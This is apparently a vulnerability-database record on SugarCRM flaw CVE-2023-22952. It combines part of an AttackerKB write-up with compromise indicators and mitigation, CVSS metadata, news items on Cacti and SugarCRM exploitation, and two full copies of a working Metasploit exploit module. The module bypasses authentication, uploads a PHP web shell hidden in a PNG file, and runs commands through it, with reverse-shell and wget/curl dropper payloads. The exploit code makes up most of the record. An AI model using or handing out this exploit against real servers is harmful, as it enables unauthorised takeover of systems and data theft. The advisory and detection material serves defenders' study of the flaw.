yohoo.phar\n --Garbled binary text--\n \n\nYou can of course vary the 0 parameter with other PHP shell command functions such as `exec`, `shell_exec` or `system`.\n\n## Evidence of compromise\n\nWhen you want to check if your system is compromised, please look for unexpected files in the `/cache/images/` directory. The published [exploit](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) had a filename `sweet.phar` that was not cleaned. However, attackers have changed these filenames such as `imagefile.phar`, `meow.phar`, `rvsm.phar`, `aws.phar`, and are using files with other extensions. \nAlso be conscious of the fact that the files might have been cleaned up by the attacker to cover their tracks.\n\nOther evidence might be failed execution request for files under the `/cache/images/` directory with the extension `php`, `phar`, `phtml`, `php7`, or any other executable extension **NOT** allowed by your web server configuration. The response codes can be found in your web server logs, such as `404` \u2013 the file was not found or `403` \u2013 the access was denied by web server.\n\n## Mitigation\n\nPlease follow the guidelines from the vendor to patch your system [January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) or configure additional security settings in your web server such as preventing PHP code parsing/execution using `.htaccess setting` file in `/cache/images/` directory and/or prevent PHP code execution by updating security settings in the `php.ini` file. Lots of security guidance is available on the Internet. \nAnother less obvious security measure to consider is to enable `SAML` authentication that will mitigate the authentication bypass issue, hence will protect you against unauthenticated malicious file uploads.\n\nI have created a `Metasploit` module to test this vulnerability. A local version of this module can found at the **References** section. \n[Submission](<https://github.com/rapid7/metasploit-framework/pull/17507>) to Metasploit mainstream is completed and module is in production.\n\n## References\n\n[Full Disclosure](<https://seclists.org/fulldisclosure/2022/Dec/31>) \n[Public Exploit \u2013 Packetstorm](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) \n[Security Advisory \u2013 sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) \n[January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) \n[Encoding web shells in PNG IDAT chunks](<https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/>) \n[Persistent PHP payloads in PNGs](<https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) \n[Metasploit Development h00die-gr3y](<https://github.com/h00die-gr3y/Metasploit/blob/main/README.md>)\n\n### Credits\n\nCredits goes to `sw33t.0day` below who discovered this vulnerability.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-11T00:00:00", "type": "attackerkb", "title": "CVE-2023-22952", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-01-11T00:00:00", "id": "AKB:3236E8D5-3A5F-4A70-9701-F945AE2F7B4C", "href": "https://attackerkb.com/topics/E486ui94II/cve-2023-22952", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-15T13:46:36", "description": "In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-11T09:15:00", "type": "prion", "title": "CVE-2023-22952", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-10T17:15:00", "id": "PRION:CVE-2023-22952", "href": "https://kb.prio-n.com/vulnerability/CVE-2023-22952", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-07-24T00:49:14", "description": "This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-10T00:00:00", "type": "zdt", "title": "SugarCRM 12.x Remote Code Execution / Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-10T00:00:00", "id": "1337DAY-ID-38255", "href": "https://0day.today/exploit/description/38255", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'securerandom'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::PhpPayloadPng\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)',\n 'Description' => %q{\n This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,\n Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and\n Serve versions prior to 12.0.2.\n\n The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with\n embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint\n /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,\n the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and\n gaining access to the system.\n\n This vulnerability does not require authentication because there is a missing authentication check in the\n loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get\n destroyed and hence the attacker can continue to send valid requests to the application.\n\n Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain\n access to the underlying operating system as the user that the web services are running as (typically www-data).\n },\n 'Author' => [\n 'Sw33t.0day', # discovery\n 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2023-22952' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],\n [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],\n [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],\n [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],\n [ 'PACKETSTORM', '170346' ]\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => [ 'unix', 'linux', 'php' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],\n 'Targets' => [\n [\n 'PHP',\n {\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X64, ARCH_X86 ],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2022-12-28',\n 'DefaultOptions' => {\n 'SSL' => false,\n 'RPORT' => 80\n },\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]),\n OptString.new('WEBSHELL', [\n false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', ''\n ]),\n OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])\n ]\n )\n end\n\n def authenticate\n # generate PHP session-id\n @phpsessid = \"PHPSESSID=#{SecureRandom.uuid}\"\n\n # randomize user and password to obfuscate and make finger printing difficult.\n user_name = Rex::Text.rand_name\n user_password = Rex::Text.rand_text_alphanumeric(8..16)\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'user_name' => user_name.to_s,\n 'user_password' => user_password.to_s\n }\n })\n if res && res.code == 500 && !res.body.blank?\n return true\n else\n return false\n end\n end\n\n def upload_webshell\n # randomize file name and extension if option WEBSHELL is not set\n file_ext = ['phar', 'phtml']\n if datastore['WEBSHELL'].blank?\n @webshell_name = \"#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}\"\n else\n @webshell_name = datastore['WEBSHELL'].to_s\n end\n\n # select webshell depending on the target setting (PHP or others).\n @post_param = Rex::Text.rand_text_alphanumeric(1..8)\n @get_param = Rex::Text.rand_text_alphanumeric(1..8)\n\n if target['Type'] == :php\n payload = \"<?php @eval(base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n else\n payload = \"<?=$_GET[\\'#{@get_param}\\'](base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n end\n\n # inject PHP payload into the PLTE chunk of the PNG image\n png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')\n if png_webshell.nil?\n return false\n end\n\n # construct multipart form data\n form_data = Rex::MIME::Message.new\n form_data.add_part('AttachFiles', nil, nil, 'form-data; name=\"action\"')\n form_data.add_part('EmailTemplates', nil, nil, 'form-data; name=\"module\"')\n form_data.add_part(png_webshell.to_s, 'image/png', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{@webshell_name}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\",\n 'data' => form_data.to_s\n })\n if res && res.code == 200 && !res.body.blank?\n # parse HTML to find the webshell name embedded in a table that indicates a successful upload\n html = res.get_html_document\n if html.at(\"td[contains(\\\"#{@webshell_name}\\\")]\")\n return true\n else\n return false\n end\n else\n return false\n end\n end\n\n def execute_php(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def execute_command(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n php_cmd_function = datastore['COMMAND']\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_get' => {\n @get_param => php_cmd_function\n },\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def exploit\n fail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate\n fail_with(Failure::NotVulnerable, \"Webshell #{@webshell_name} upload failed, the system is likely patched.\") unless upload_webshell\n register_file_for_cleanup(@webshell_name.to_s)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :php\n execute_php(payload.encoded)\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(linemax: 65536)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/38255", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-07-24T03:07:52", "description": "This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint /index.php?module=EmailTemplates&action;=AttachFiles. Once uploaded to the server, depending on server configuration, the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and gaining access to the system. This vulnerability does not require authentication because there is a missing authentication check in the loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application. Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain access to the underlying operating system as the user that the web services are running as (typically www-data).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-09T15:28:03", "type": "metasploit", "title": "SugarCRM unauthenticated Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-09T15:28:46", "id": "MSF:EXPLOIT-MULTI-HTTP-SUGARCRM_WEBSHELL_CVE_2023_22952-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/sugarcrm_webshell_cve_2023_22952/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'securerandom'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::PhpPayloadPng\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)',\n 'Description' => %q{\n This module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise,\n Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and\n Serve versions prior to 12.0.2.\n\n The vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with\n embedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint\n /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration,\n the attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and\n gaining access to the system.\n\n This vulnerability does not require authentication because there is a missing authentication check in the\n loadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get\n destroyed and hence the attacker can continue to send valid requests to the application.\n\n Because of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain\n access to the underlying operating system as the user that the web services are running as (typically www-data).\n },\n 'Author' => [\n 'Sw33t.0day', # discovery\n 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2023-22952' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],\n [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],\n [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],\n [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],\n [ 'PACKETSTORM', '170346' ]\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => [ 'unix', 'linux', 'php' ],\n 'Privileged' => false,\n 'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],\n 'Targets' => [\n [\n 'PHP',\n {\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X64, ARCH_X86 ],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2022-12-28',\n 'DefaultOptions' => {\n 'SSL' => false,\n 'RPORT' => 80\n },\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]),\n OptString.new('WEBSHELL', [\n false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', ''\n ]),\n OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])\n ]\n )\n end\n\n def authenticate\n # generate PHP session-id\n @phpsessid = \"PHPSESSID=#{SecureRandom.uuid}\"\n\n # randomize user and password to obfuscate and make finger printing difficult.\n user_name = Rex::Text.rand_name\n user_password = Rex::Text.rand_text_alphanumeric(8..16)\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'user_name' => user_name.to_s,\n 'user_password' => user_password.to_s\n }\n })\n if res && res.code == 500 && !res.body.blank?\n return true\n else\n return false\n end\n end\n\n def upload_webshell\n # randomize file name and extension if option WEBSHELL is not set\n file_ext = ['phar', 'phtml']\n if datastore['WEBSHELL'].blank?\n @webshell_name = \"#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}\"\n else\n @webshell_name = datastore['WEBSHELL'].to_s\n end\n\n # select webshell depending on the target setting (PHP or others).\n @post_param = Rex::Text.rand_text_alphanumeric(1..8)\n @get_param = Rex::Text.rand_text_alphanumeric(1..8)\n\n if target['Type'] == :php\n payload = \"<?php @eval(base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n else\n payload = \"<?=$_GET[\\'#{@get_param}\\'](base64_decode($_POST[\\'#{@post_param}\\']));?>\"\n end\n\n # inject PHP payload into the PLTE chunk of the PNG image\n png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')\n if png_webshell.nil?\n return false\n end\n\n # construct multipart form data\n form_data = Rex::MIME::Message.new\n form_data.add_part('AttachFiles', nil, nil, 'form-data; name=\"action\"')\n form_data.add_part('EmailTemplates', nil, nil, 'form-data; name=\"module\"')\n form_data.add_part(png_webshell.to_s, 'image/png', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{@webshell_name}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\",\n 'data' => form_data.to_s\n })\n if res && res.code == 200 && !res.body.blank?\n # parse HTML to find the webshell name embedded in a table that indicates a successful upload\n html = res.get_html_document\n if html.at(\"td[contains(\\\"#{@webshell_name}\\\")]\")\n return true\n else\n return false\n end\n else\n return false\n end\n end\n\n def execute_php(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def execute_command(cmd, _opts = {})\n payload = Base64.strict_encode64(cmd)\n php_cmd_function = datastore['COMMAND']\n return send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name),\n 'cookie' => @phpsessid.to_s,\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_get' => {\n @get_param => php_cmd_function\n },\n 'vars_post' => {\n @post_param => payload\n }\n })\n end\n\n def exploit\n fail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate\n fail_with(Failure::NotVulnerable, \"Webshell #{@webshell_name} upload failed, the system is likely patched.\") unless upload_webshell\n register_file_for_cleanup(@webshell_name.to_s)\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :php\n execute_php(payload.encoded)\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(linemax: 65536)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2023-01-14T08:11:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjkB5AmEbwM4iIOKiuxSqAuEFCB26nFZNhi3MlX28DbJMTiPHEhK8w_VHD4m0ZctINGUVCe3SgBLZX2hWEak6TENZ3_nCdQx7WMGMqjrjXCjdVS8zWcx9md3i_ZI457Tk6-gGIIvBY--Nz2MXISSH9dmYkwmv-vQmHhCoLvkGYsY6kdCdEEoiI6qHke/s728-rj-e365/catci.png>)\n\nA majority of internet-exposed Cacti servers have not been patched against a recently patched critical security vulnerability that has come under active exploitation in the wild.\n\nThat's according to attack surface management platform Censys, which [found](<https://censys.io/cve-2022-46169-cacti/>) only 26 out of a total of 6,427 servers to be running a [patched version](<https://github.com/Cacti/cacti/releases/tag/release%2F1.2.23>) of Cacti (1.2.23 and 1.3.0).\n\nThe [issue](<https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf>) in question relates to [CVE-2022-46169](<https://nvd.nist.gov/vuln/detail/CVE-2022-46169>) (CVSS score: 9.8), a combination of authentication bypass and command injection that enables an unauthenticated user to execute arbitrary code on an affected version of the open-source, web-based monitoring solution.\n\nDetails about the flaw, which impacts versions 1.2.22 and below, were first revealed by SonarSource. The flaw was reported to the project maintainers on December 2, 2022.\n\n\"A hostname-based authorization check is not implemented safely for most installations of Cacti,\" SonarSource researcher Stefan Schiller [noted](<https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/>) earlier this month, adding \"unsanitized user input is propagated to a string used to execute an external command.\"\n\nThe public disclosure of the vulnerability has also led to \"exploitation attempts,\" with the [Shadowserver Foundation](<https://twitter.com/Shadowserver/status/1611700723556786176>) and [GreyNoise](<https://viz.greynoise.io/tag/cacti-remote-agent-php-unauthenticated-command-injection-attempt?days=30>) warning of malicious attacks originating from one IP address located in Ukraine so far.\n\nA majority of the unpatched versions (1,320) are located in Brazil, followed by Indonesia, the U.S., China, Bangladesh, Russia, Ukraine, the Philippines, Thailand, and the U.K.\n\n### SugarCRM Flaw Actively Exploited to Drop Web Shells\n\nThe development comes as SugarCRM [shipped fixes](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) for a publicly disclosed vulnerability that has also been actively weaponized to drop a PHP-based web shell on 354 unique hosts, Censys [said](<https://censys.io/tracking-a-sugarcrm-zero-day/>) in an independent advisory.\n\nThe bug, tracked as [CVE-2023-22952](<https://nvd.nist.gov/vuln/detail/CVE-2023-22952>), concerns a case of missing input validation that could result in injection of arbitrary PHP code. It has been addressed in SugarCRM versions 11.0.5 and 12.0.2.\n\nIn the attacks detailed by Censys, the web shell is used as a conduit to execute additional commands on the infected machine with the same permissions as the user running the web service. A majority of the infections have been reported in the U.S., Germany, Australia, France, and the U.K. \n\nIt's not uncommon for malicious actors to capitalize on newly disclosed vulnerabilities to carry out their attacks, making it imperative that users move quickly plug the security holes.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-14T08:11:00", "type": "thn", "title": "Cacti Servers Under Attack as Majority Fail to Patch Critical Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-46169", "CVE-2023-22952"], "modified": "2023-01-14T08:11:22", "id": "THN:97E5CF17B9C951760E9B4C679F9F6DEE", "href": "https://thehackernews.com/2023/01/cacti-servers-under-attack-as-majority.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-03T15:36:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEimyue4RAUobLSPaohWuX32BxGD8BNCIv751w1ZahrzYwEdFlgLkf5p7t9WLvQi75_oWEaPEUPZ59NXh292XZYa1smVBKDoEsWqF-qfUYc1VGNWP0Os3Dnc5sqSVZ9exN0n0Zzo16RREkqYLv7cgQTuLj6nkli8bGpN3m53kdFaqHMnlXeuBeo4Y6AP/s728-e365/oracle.png>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on February 2 [added](<https://www.cisa.gov/uscert/ncas/current-activity/2023/02/02/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two security flaws to its Known Exploited Vulnerabilities (KEV) 